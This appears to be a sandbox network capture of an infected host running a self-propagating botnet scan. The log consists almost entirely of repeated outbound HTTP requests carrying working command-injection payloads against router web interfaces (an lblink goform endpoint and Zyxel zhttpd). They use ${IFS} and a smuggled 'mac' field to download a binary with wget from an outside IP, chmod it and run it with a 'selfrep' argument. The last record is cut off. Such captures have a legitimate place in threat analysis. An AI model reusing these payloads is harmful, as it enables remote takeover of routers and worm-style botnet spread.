                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.925302029 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7849192.168.2.134389454.9.27.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.345339060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7850192.168.2.1337136172.121.104.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.345379114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7851192.168.2.1338862188.252.156.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.345418930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7852192.168.2.134165477.149.148.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.345474005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7853192.168.2.1345054186.23.149.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.345513105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7854192.168.2.1343918193.21.117.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.345591068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7855192.168.2.1343018164.232.27.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.345618010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7856192.168.2.1348426171.118.130.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.345659971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7857192.168.2.133691472.36.214.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.345695972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7858192.168.2.1348494201.170.18.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.345722914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7859192.168.2.1333140132.71.82.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.345758915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7860192.168.2.1350896132.38.197.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.345791101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7861192.168.2.1359382212.63.178.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.345828056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7862192.168.2.1339016126.53.201.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.345869064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7863192.168.2.1343628170.79.39.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.345921040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7864192.168.2.1357928170.109.115.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.345952988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7865192.168.2.133910893.188.251.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.345983982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7866192.168.2.1355074195.200.205.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346009970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7867192.168.2.1344114153.88.116.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346076012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7868192.168.2.135461270.219.116.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346122026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7869192.168.2.1333470161.160.150.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346164942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7870192.168.2.1334880151.129.164.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346175909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7871192.168.2.1346080179.73.217.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346230030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7872192.168.2.1353724194.23.250.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346282959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7873192.168.2.1336636111.189.142.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346303940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7874192.168.2.1358106157.229.254.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346343040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7875192.168.2.1340408193.105.187.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346379995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7876192.168.2.1336926196.127.204.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346409082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7877192.168.2.1353708129.244.102.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346446991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7878192.168.2.133492832.121.208.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346491098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7879192.168.2.1353964207.79.135.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346528053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7880192.168.2.133956495.195.36.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346560955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7881192.168.2.133403881.11.207.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346592903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7882192.168.2.135985047.116.23.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346632004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7883192.168.2.134658435.220.8.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346690893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7884192.168.2.1337202166.73.74.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346716881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7885192.168.2.134600614.156.211.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346759081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7886192.168.2.1359316188.48.55.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346815109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7887192.168.2.135197896.51.140.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346868992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7888192.168.2.133897299.80.252.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346894026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7889192.168.2.1341006152.52.206.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346959114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7890192.168.2.135628219.181.164.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.346991062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7891192.168.2.135289057.90.163.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347048044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7892192.168.2.134792297.15.171.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347069979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7893192.168.2.1353136159.58.187.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347112894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7894192.168.2.1357160156.15.183.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347162962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7895192.168.2.1350858104.255.211.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347199917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7896192.168.2.133896851.242.98.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347229958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7897192.168.2.1338068202.107.124.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347268105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7898192.168.2.1351890129.46.137.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347310066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7899192.168.2.1351014188.83.150.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347340107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7900192.168.2.1343958164.103.251.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347393990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7901192.168.2.135703249.29.182.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347438097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7902192.168.2.1360180113.67.26.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347489119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7903192.168.2.133898859.63.223.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347522020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7904192.168.2.1334766218.183.161.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347563982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7905192.168.2.134567413.16.13.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347599030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7906192.168.2.1333278198.237.136.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347640038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7907192.168.2.1346282108.80.85.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347700119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7908192.168.2.134776052.43.210.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347733974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7909192.168.2.133741251.6.60.51443
                                                  TimestampBytes transferredDirectionData
